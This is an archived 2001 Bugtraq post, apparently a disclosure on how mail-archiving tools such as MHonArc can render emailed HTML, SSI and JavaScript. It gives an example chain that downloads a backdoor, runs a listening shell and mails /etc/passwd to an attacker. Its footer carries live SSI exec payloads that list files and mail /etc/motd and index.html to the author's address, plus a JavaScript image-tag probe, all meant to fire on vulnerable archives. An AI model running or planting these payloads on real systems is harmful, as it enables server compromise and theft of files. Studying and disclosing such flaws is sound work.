The Dangers of Email Archives

[bugtraq <bugtraq () cgisecurity net>]

 Hello,
 
 Below is something I wrote in regards to threats email archiving software/tools related can bring.
 
 
 # MHonArc
 # email to html converter while not vulnerable itself
 # most people use to to convert/display information for archived
 # lists. (VULNERABLE/TESTED)
 
 # Could be exploited via javscript insertion from img tag
 # and possibly others.(See Georgi Guninski examples)
 http://www.oac.uci.edu/indiv/ehood/mhonarc.html
 
 While this product itself doesn't have a hole in it; it is often used to help
 to translate mail for other archiving software. I've seen in some examples
 that email was translated with this tool and archived with other software, and html
 tags where translated/executed as normal..
 
 
 Could be exploited via javscript insertion from img tag
 and possibly others.(See Georgi Guninski examples)
 
 
 
 I haven't had the time to test alot of other products.
 Comments, Ideas, blah?
 
 
 
 
 
 
 
 
                                    Author: Zenomorph
                                  admin () cgisecurity com
           Email Archives may allow Distributed Attacks against users and Web servers
                                 
 
 
 
 
 
 
 
 
 I Introduction
 
 Mailing lists are often archived for later viewing on websites. The software
 that archives these email messages may allow an attacker to execute commands,
 include false information, cause a wide scale browser DOS, and other possibilities.
 
 Millions of sites archive these mailing lists and each site archiving a malicious post
 could either be attacked or help launch an attack.
 
 
 
 
 
 II Examples:
 
 Server Side Includes
 
 If an attacker sends a email with a Server Side include(SSI) tag it may be possible
 to carry out the following attack types listed below.
 
 * (Client side) Including of large files, which may lead in a small Denial of Service of clients.
   (Bandwidth consumption, Memory consumption, etc...)
 
 * (Client/Server side) Including of local files such as /dev/urandom. Which will not only 
   slow down the server and eat up bandwidth , but possibly DOS the client viewing the page.
 
 * (Server side) Commands to get executed. The server may execute the SSI request if the server 
   is configured correctly. This could lead to possible web server compromise. With the right 
   series of commands an attacker could download and install a backdoor with web server privileges.
 
 
 Below is a example to give you an idea.
 
 id;wget http://host/backdoor.c;cc backdoor.c;./a.out <port to listen on>;mail attacker@host </etc/passwd;
 (Just a random example)
 
 Then the attacker would just need to telnet to the port specified within
 the trojan and he would be greeted by a shell with the user rights of the 
 web server. With a local account an attacker could locally exploit your 
 machine to gain administrative privileges.
 
  
 Possible forging of other users posts:
 
 (A More advanced method, which would be on a mail archiving script basis. 
 One would have to learn the output of a post along with it's formatting, 
 and then it may be possible to forge a reply from another user.)
 
 
 
 Browser Denial of service:
 
 Some browsers have holes which can lead to either a browser or system crash. This would
 occur when an email had been sent with the proper html/JavaScript tags. The email would
 be archived. With some archiving software the html isn't striped , and it is included
 on the website page your viewing.
 
 
 
 Malicious JavaScript/Java applets:
 
 May be possible depending on browser security settings.
 
 
 
 PHP Insertion:
 
 May allow command execution or file includes depending on archiving software.
 
 
 
 Other Markup Languages:
 
 Any other markup language which may allow file includes, or command execution.
 
 
 
 
 
 III Solutions :
 
 * An example of a solution would be to program these achievers to add a slash
   whenever a < and > is present to help prevent execution of html/other.
   (Example: <b>hi</b> becomes <\b>hi<\/b> or becomes <\b/>hi<\/b/> ) 
 
 * Removing the < and > all together , but if program code or math is involved
   in the post it may remove important information.
 
 * The best solution would be to print out the archives in txt format so no 
   code can be executed.
 
 
 
 
 
 Published to the Public October 2001
 Copyright October 2001 Cgisecurity.com
 
 EOF

 Lame footer
 ******************************************************************
 <!--#exec cmd="ls -al"-->
 If you see a listing of files then this vendor is effected.
 
 <img src=javascript:alert(document.domain)>
 If you see a popup window then this vendor is effected.
 
 <!--#exec cmd="mail bugtraq () cgisecurity com < /etc/motd"-->
Attempt mailing me motd in case your effected.

<!--#exec cmd="mail bugtraq () cgisecurity com < index.html"-->
 Attempt mailing me your index.html file for shits and giggles
******************************************************************